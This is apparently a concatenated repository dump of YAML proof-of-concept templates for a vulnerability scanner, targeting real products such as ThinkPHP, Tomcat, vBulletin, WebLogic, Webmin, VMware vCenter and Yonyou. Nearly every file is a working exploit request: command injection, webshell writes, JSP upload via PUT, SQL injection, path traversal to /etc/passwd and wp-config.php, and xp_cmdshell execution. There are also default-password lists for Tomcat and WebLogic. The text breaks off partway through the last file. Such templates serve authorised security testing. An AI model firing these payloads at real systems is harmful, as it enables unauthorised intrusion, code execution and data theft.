| name: poc-yaml-tensorboard-unauth 2 | rules: 3 | - method: GET 4 | path: / 5 | follow_redirects: true 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"The TensorFlow Authors. All Rights Reserved.") 8 | - method: GET 9 | path: '/data/plugins_listing' 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"profile") && response.body.bcontains(b"distributions") 13 | detail: 14 | author: p0wd3r 15 | links: 16 | - https://www.tensorflow.org/guide/summaries_and_tensorboard?hl=zh-CN 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/terramaster-cve-2020-15568.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-cve-2020-15568 2 | set: 3 | r1: randomLowercase(10) 4 | r2: randomInt(800000000, 1000000000) 5 | r3: randomInt(800000000, 1000000000) 6 | rules: 7 | - method: GET 8 | path: /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20{{r2}}%20%2B%20{{r3}})%3E{{r1}} 9 | follow_redirects: false 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /include/{{r1}} 14 | expression: | 15 | response.status == 200 && response.body.bcontains(bytes(string(r2 + r3))) 16 | detail: 17 | author: albertchang 18 | Affected Version: "TOS version 4.1.24 and below" 19 | links: 20 | - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ 21 | -------------------------------------------------------------------------------- /src/plugins/pocs/terramaster-tos-rce-cve-2020-28188.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-terramaster-tos-rce-cve-2020-28188 2 | set: 3 | r1: randomLowercase(10) 4 | rules: 5 | - method: GET 6 | path: /include/makecvs.php?Event=http|echo%20"<?php%20echo%20md5({{r1}});unlink(__FILE__);?>"%20>>%20/usr/www/{{r1}}.php%20&&%20chmod%20755%20/usr/www/{{r1}}.php|| 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.content_type.contains("text/csv") && response.body.bcontains(bytes("Service,DateTime")) 10 | - method: GET 11 | path: /{{r1}}.php 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && response.body.bcontains(bytes(md5(r1))) 15 | detail: 16 | author: Print1n 17 | links: 18 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkadmin-v6-readfile.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkadmin-v6-readfile 2 | rules: 3 | - method: GET 4 | path: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 5 | follow_redirects: true 6 | expression: | 7 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes("PD9waH")) && response.body.bcontains(bytes("VGhpbmtBZG1pbg")) 8 | detail: 9 | author: 0x_zmz(github.com/0x-zmz) 10 | info: thinkadmin-v6-readfile By 0x_zmz 11 | links: 12 | - https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw 13 | - https://github.com/0x-zmz 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkcmf-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-lfi 2 | 3 | rules: 4 | - method: GET 5 | path: "/?a=display&templateFile=README.md" 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes(string(b"ThinkCMF"))) && response.body.bcontains(bytes(string(b"## README"))) 8 | 9 | detail: 10 | author: JerryKing 11 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 12 | links: 13 | - https://www.freebuf.com/vuls/217586.html 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkcmf-write-shell.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkcmf-write-shell 2 | set: 3 | r: randomInt(10000, 20000) 4 | r1: randomInt(1000000000, 2000000000) 5 | rules: 6 | - method: GET 7 | path: "/index.php?a=fetch&content=%3C?php+file_put_contents(%22{{r}}.php%22,%22%3C?php+echo+{{r1}}%3B%22)%3B" 8 | expression: "true" 9 | - method: GET 10 | path: "/{{r}}.php" 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1))) 13 | 14 | detail: 15 | author: violin 16 | ThinkCMF: x1.6.0/x2.1.0/x2.2.0-2 17 | links: 18 | - https://www.freebuf.com/vuls/217586.html 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkphp-v6-file-write.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp-v6-file-write 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: GET 6 | path: /{{f1}}.php 7 | follow_redirects: true 8 | expression: | 9 | response.status == 404 10 | - method: GET 11 | path: / 12 | headers: 13 | Cookie: PHPSESSID=../../../../public/{{f1}}.php 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].contains(string(f1)) 17 | - method: GET 18 | path: /{{f1}}.php 19 | follow_redirects: true 20 | expression: | 21 | response.status == 200 && response.content_type.contains("text/html") 22 | detail: 23 | author: Loneyer 24 | Affected Version: "Thinkphp 6.0.0" 25 | links: 26 | - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write 27 | -------------------------------------------------------------------------------- /src/plugins/pocs/thinkphp5-controller-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-thinkphp5-controller-rce 2 | rules: 3 | - method: GET 4 | path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 5 | expression: | 6 | response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129") 7 | 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce -------------------------------------------------------------------------------- /src/plugins/pocs/tianqing-info-leak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tianqing-info-leak 2 | rules: 3 | - method: GET 4 | path: /api/dbstat/gettablessize 5 | expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"schema_name") && response.body.bcontains(b"table_name") 6 | detail: 7 | author: jingling(https://github.com/shmilylty) 8 | links: 9 | - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g 10 | -------------------------------------------------------------------------------- /src/plugins/pocs/tomcat-cve-2017-12615-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2017-12615-rce 2 | set: 3 | filename: randomLowercase(6) 4 | verifyStr: randomLowercase(12) 5 | commentStr: randomLowercase(12) 6 | rules: 7 | - method: PUT 8 | path: '/{{filename}}.jsp/' 9 | body: '{{verifyStr}} <%-- {{commentStr}} --%>' 10 | follow_redirects: false 11 | expression: | 12 | response.status == 201 13 | - method: GET 14 | path: '/{{filename}}.jsp' 15 | follow_redirects: false 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(verifyStr)) && !response.body.bcontains(bytes(commentStr)) 18 | detail: 19 | author: j4ckzh0u(https://github.com/j4ckzh0u) 20 | links: 21 | - https://www.seebug.org/vuldb/ssvid-96562 22 | - https://mp.weixin.qq.com/s/sulJSg0Ru138oASiI5cYAA 23 | -------------------------------------------------------------------------------- /src/plugins/pocs/tomcat-cve-2018-11759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-cve-2018-11759 2 | rules: 3 | - method: GET 4 | path: /jkstatus; 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "JK Status Manager".bmatches(response.body) && "Listing Load Balancing Worker".bmatches(response.body) 8 | - method: GET 9 | path: /jkstatus;?cmd=dump 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && "ServerRoot=*".bmatches(response.body) 13 | detail: 14 | author: loneyer 15 | links: 16 | - https://github.com/immunIT/CVE-2018-11759 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/tomcat-manager-weak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tomcat-manager-weak 2 | sets: 3 | username: 4 | - tomcat 5 | - admin 6 | - root 7 | - manager 8 | password: 9 | - tomcat 10 | - "" 11 | - admin 12 | - 123456 13 | - root 14 | payload: 15 | - base64(username+":"+password) 16 | rules: 17 | - method: GET 18 | path: /manager/html 19 | follow_redirects: false 20 | expression: | 21 | response.status == 401 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") 22 | - method: GET 23 | path: /manager/html 24 | headers: 25 | Authorization: Basic {{payload}} 26 | follow_redirects: false 27 | expression: | 28 | response.status == 200 && response.body.bcontains(b"tomcat") && response.body.bcontains(b"manager") 29 | detail: 30 | author: shadown1ng(https://github.com/shadown1ng) 31 | 32 | -------------------------------------------------------------------------------- /src/plugins/pocs/tongda-meeting-unauthorized-access.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tongda-meeting-unauthorized-access 2 | rules: 3 | - method: GET 4 | path: >- 5 | /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string("creator"))) && response.body.bcontains(bytes(string("originalTitle"))) 9 | detail: 10 | author: 清风明月(www.secbook.info) 11 | influence_version: ' < 通达OA 11.5' 12 | links: 13 | - https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/tongda-user-session-disclosure.yml: -------------------------------------------------------------------------------- 1 | name: tongda-user-session-disclosure 2 | rules: 3 | - method: GET 4 | path: /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 5 | expression: response.body.bcontains(b'RELOGIN') && response.status == 200 6 | detail: 7 | author: kzaopa(https://github.com/kzaopa) 8 | description: | 9 | 通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统 10 | links: 11 | - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html 12 | - https://www.cnblogs.com/T0uch/p/14475551.html 13 | - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/ 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/tpshop-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /index.php/Home/uploadify/fileList?type=.+&path=../ 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("\"state\":\"SUCCESS\""))) && response.body.bcontains(bytes(string("total"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: 'TPshop' 13 | links: 14 | - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA 15 | - http://www.tp-shop.cn 16 | exploit: 17 | - https://localhost/index.php/Home/uploadify/fileList?type=.+&path=../../ 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/tpshop-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tpshop-sqli 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /mobile/index/index2/id/1) and (select 1 from (select count(*),concat(0x716b627671,(select md5({{r}})),0x716b627671,floor(rand(0)*2))x from information_schema.tables group by x)a)-- 8 | follow_redirects: true 9 | expression: | 10 | response.body.bcontains(bytes(md5(string(r)))) 11 | detail: 12 | author: hanxiansheng26(https://github.com/hanxiansheng26) 13 | Affected Version: "tpshop<3.0" 14 | links: 15 | - https://xz.aliyun.com/t/6635 -------------------------------------------------------------------------------- /src/plugins/pocs/tvt-nvms-1000-file-read-cve-2019-20085.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-tvt-nvms-1000-file-read-cve-2019-20085 2 | manual: true 3 | transport: http 4 | rules: 5 | - method: GET 6 | path: /Pages/login.htm 7 | expression: response.status == 200 && response.body.bcontains(b"<title>NVMS-1000") 8 | 9 | - method: GET 10 | path: /../../../../../../../../../../../../windows/win.ini 11 | expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support") 12 | 13 | detail: 14 | author: fuzz7j(https://github.com/fuzz7j) 15 | links: 16 | - https://www.exploit-db.com/exploits/47774 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/ueditor-cnvd-2017-20077-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-ueditor-cnvd-2017-20077-file-upload 2 | rules: 3 | - method: GET 4 | path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: 'UEditor v1.4.3.3' 13 | links: 14 | - https://zhuanlan.zhihu.com/p/85265552 15 | - https://www.freebuf.com/vuls/181814.html 16 | exploit: >- 17 | http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/uwsgi-cve-2018-7490.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-uwsgi-cve-2018-7490 2 | rules: 3 | - method: GET 4 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 8 | detail: 9 | links: 10 | - https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490 -------------------------------------------------------------------------------- /src/plugins/pocs/vbulletin-cve-2019-16759-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759-bypass 2 | set: 3 | f1: randomInt(800000000, 900000000) 4 | rules: 5 | - method: POST 6 | path: /ajax/render/widget_tabbedcontainer_tab_panel 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | subWidgets[0][template]=widget_php&subWidgets[0][config][code]=var_dump(md5({{f1}})); 11 | follow_redirects: true 12 | expression: | 13 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(f1)), 0, 31))) && response.content_type.contains("application/json") 14 | detail: 15 | author: Loneyer 16 | links: 17 | - https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ 18 | -------------------------------------------------------------------------------- /src/plugins/pocs/vbulletin-cve-2019-16759.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vbulletin-cve-2019-16759 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: POST 6 | path: / 7 | headers: 8 | Content-Type: application/x-www-form-urlencoded 9 | body: >- 10 | routestring=ajax/render/widget_php&widgetConfig%5bcode%5d=print(md5({{rand}}))%3bexit%3b 11 | follow_redirects: true 12 | expression: | 13 | response.body.bcontains(bytes(md5(string(rand)))) 14 | detail: 15 | author: JingLing(https://hackfun.org/) 16 | vbulletion_version: 5.0.0 - 5.5.4 17 | links: 18 | - https://securityaffairs.co/wordpress/91689/hacking/unpatched-critical-0-day-vbulletin.html 19 | - https://xz.aliyun.com/t/6419 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/vmware-vcenter-arbitrary-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vcenter-arbitrary-file-read 2 | groups: 3 | win: 4 | - method: GET 5 | path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") 9 | linux: 10 | - method: GET 11 | path: /eam/vib?id=/etc/passwd 12 | follow_redirects: false 13 | expression: | 14 | response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) 15 | detail: 16 | author: MrP01ntSun(https://github.com/MrPointSun) 17 | links: 18 | - https://t.co/LfvbyBUhF5 19 | -------------------------------------------------------------------------------- /src/plugins/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 2 | rules: 3 | - method: GET 4 | path: /ui/vropspluginui/rest/services/uploadova 5 | follow_redirects: false 6 | expression: | 7 | response.status == 405 && response.body.bcontains(b"Method Not Allowed") 8 | - method: GET 9 | path: /ui/vropspluginui/rest/services/getstatus 10 | follow_redirects: false 11 | expression: | 12 | response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") 13 | detail: 14 | author: B1anda0(https://github.com/B1anda0) 15 | links: 16 | - https://swarm.ptsecurity.com/unauth-rce-vmware/ -------------------------------------------------------------------------------- /src/plugins/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf 2 | rules: 3 | - method: POST 4 | path: /casa/nodes/thumbprints 5 | headers: 6 | Content-Type: application/json 7 | body: | 8 | ["127.0.0.1:443/ui/"] 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) 12 | detail: 13 | author: Loneyer 14 | links: 15 | - https://www.vmware.com/security/advisories/VMSA-2021-0004.html 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/weaver-E-Cology-getSqlData-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weaver-E-Cology-getSqlData-sqli 2 | rules: 3 | - method: GET 4 | path: /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(b'Microsoft SQL Server') 8 | 9 | detail: 10 | author: PeiQi0 11 | links: 12 | - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md 13 | tags: weaver,sqli 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/weblogic-console-weak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-console-weak 2 | sets: 3 | username: 4 | - weblogic 5 | password: 6 | - weblogic 7 | - weblogic1 8 | - welcome1 9 | - Oracle@123 10 | - weblogic123 11 | payload: 12 | - UTF-8 13 | rules: 14 | - method: HEAD 15 | path: /console/j_security_check 16 | follow_redirects: false 17 | expression: | 18 | response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION") 19 | - method: POST 20 | path: /console/j_security_check 21 | follow_redirects: false 22 | headers: 23 | Content-type: application/x-www-form-urlencoded 24 | body: | 25 | j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}} 26 | expression: | 27 | !response.body.bcontains(b"LoginForm.jsp") 28 | detail: 29 | author: shadown1ng(https://github.com/shadown1ng) -------------------------------------------------------------------------------- /src/plugins/pocs/weblogic-cve-2020-14750.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-cve-2020-14750 2 | rules: 3 | - method: GET 4 | path: /console/images/%252E./console.portal 5 | follow_redirects: false 6 | expression: | 7 | response.status == 302 && (response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console/jsp/common/NoJMX.jsp"))) 8 | detail: 9 | author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) 10 | weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 11 | links: 12 | - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html 13 | -------------------------------------------------------------------------------- /src/plugins/pocs/weblogic-ssrf.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weblogic-ssrf 2 | rules: 3 | - method: GET 4 | path: >- 5 | /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 6 | headers: 7 | Cookie: >- 8 | publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; 9 | follow_redirects: false 10 | expression: >- 11 | response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/webmin-cve-2019-15107-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-webmin-cve-2019-15107-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | url: request.url 6 | rules: 7 | - method: POST 8 | path: /password_change.cgi 9 | headers: 10 | Referer: "{{url}}" 11 | body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 12 | follow_redirects: false 13 | expression: > 14 | response.body.bcontains(bytes(string(r1 + r2))) 15 | detail: 16 | author: danta 17 | description: Webmin 远程命令执行漏洞(CVE-2019-15107) 18 | links: 19 | - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 20 | -------------------------------------------------------------------------------- /src/plugins/pocs/weiphp-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-weiphp-sql 2 | set: 3 | rand: randomInt(200000000, 210000000) 4 | rules: 5 | - method: GET 6 | path: /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)--+ 7 | expression: 8 | response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31))) 9 | detail: 10 | author: sakura404x 11 | version: Weiphp<=5.0 12 | links: 13 | - https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-exp-sql.md 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/wifisky-default-password-cnvd-2021-39012.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wifisky-default-password-cnvd-2021-39012 2 | rules: 3 | - method: POST 4 | path: /login.php?action=login&type=admin 5 | follow_redirects: false 6 | body: >- 7 | username=admin&password=admin 8 | expression: | 9 | response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}") 10 | detail: 11 | author: Print1n(http://print1n.top) 12 | links: 13 | - https://www.cnvd.org.cn/flaw/show/CNVD-2021-39012 -------------------------------------------------------------------------------- /src/plugins/pocs/wordpress-cve-2019-19985-infoleak.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-cve-2019-19985-infoleak 2 | rules: 3 | - method: GET 4 | path: "/wp-admin/admin.php?page=download_report&report=users&status=all" 5 | follow_redirects: false 6 | expression: > 7 | response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) 8 | detail: 9 | author: bufsnake(https://github.com/bufsnake) 10 | links: 11 | - https://www.exploit-db.com/exploits/48698 12 | -------------------------------------------------------------------------------- /src/plugins/pocs/wordpress-ext-adaptive-images-lfi.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wordpress-ext-adaptive-images-lfi 2 | rules: 3 | - method: GET 4 | path: >- 5 | /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php 6 | follow_redirects: false 7 | expression: > 8 | response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") 9 | detail: 10 | author: FiveAourThe(https://github.com/FiveAourThe) 11 | links: 12 | - https://www.anquanke.com/vul/id/1674598 13 | - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 14 | -------------------------------------------------------------------------------- /src/plugins/pocs/wuzhicms-v410-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-wuzhicms-v410-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 6 | follow_redirects: false 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"81dc9bdb52d04dc20036dbd8313ed05") && response.body.bcontains(b"sql_error:MySQL Query Error") 9 | detail: 10 | author: leezp 11 | Affected Version: "wuzhicms-v4.1.0" 12 | vuln_url: "/api/sms_check.php" 13 | links: 14 | - https://github.com/wuzhicms/wuzhicms/issues/184 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/xdcms-sql.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xdcms-sql 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: POST 7 | path: "/index.php?m=member&f=login_save" 8 | body: | 9 | username=dd' or extractvalue(0x0a,concat(0x0a,{{r1}}*{{r2}}))#&password=dd&submit=+%B5%C7+%C2%BC+ 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: amos1 14 | links: 15 | - https://www.uedbox.com/post/35188/ 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/xiuno-bbs-cvnd-2019-01348-reinstallation.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 2 | rules: 3 | - method: GET 4 | path: /install/ 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: '=< Xiuno BBS 4.0.4' 13 | links: 14 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/xunchi-cnvd-2020-23735-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xunchi-cnvd-2020-23735-file-read 2 | rules: 3 | - method: GET 4 | path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: ' >= V2.3' 13 | links: 14 | - http://www.cnxunchi.com 15 | - https://www.cnvd.org.cn/flaw/show/2025171 16 | -------------------------------------------------------------------------------- /src/plugins/pocs/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: "/admin/?a=Factory();print({{r}}%2b{{r1}});//../" 8 | expression: | 9 | response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 12 | yccms: v3.3 13 | links: 14 | - https://blog.csdn.net/qq_36374896/article/details/84839891 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/yonyou-grp-u8-sqli-to-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-grp-u8-sqli-to-rce 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: POST 7 | path: /Proxy 8 | follow_redirects: false 9 | body: | 10 | cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://www.hackbug.net/archives/111.html 17 | -------------------------------------------------------------------------------- /src/plugins/pocs/yonyou-nc-bsh-servlet-bshservlet-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-nc-bsh-servlet-bshservlet-rce 2 | set: 3 | r1: randomInt(8000, 9999) 4 | r2: randomInt(8000, 9999) 5 | rules: 6 | - method: POST 7 | path: /servlet/~ic/bsh.servlet.BshServlet 8 | body: bsh.script=print%28{{r1}}*{{r2}}%29%3B 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 11 | detail: 12 | author: B1anda0(https://github.com/B1anda0) 13 | links: 14 | - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A 15 | -------------------------------------------------------------------------------- /src/plugins/pocs/yonyou-u8-oa-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yongyou-u8-oa-sqli 2 | set: 3 | rand: randomInt(200000000, 220000000) 4 | rules: 5 | - method: GET 6 | path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) 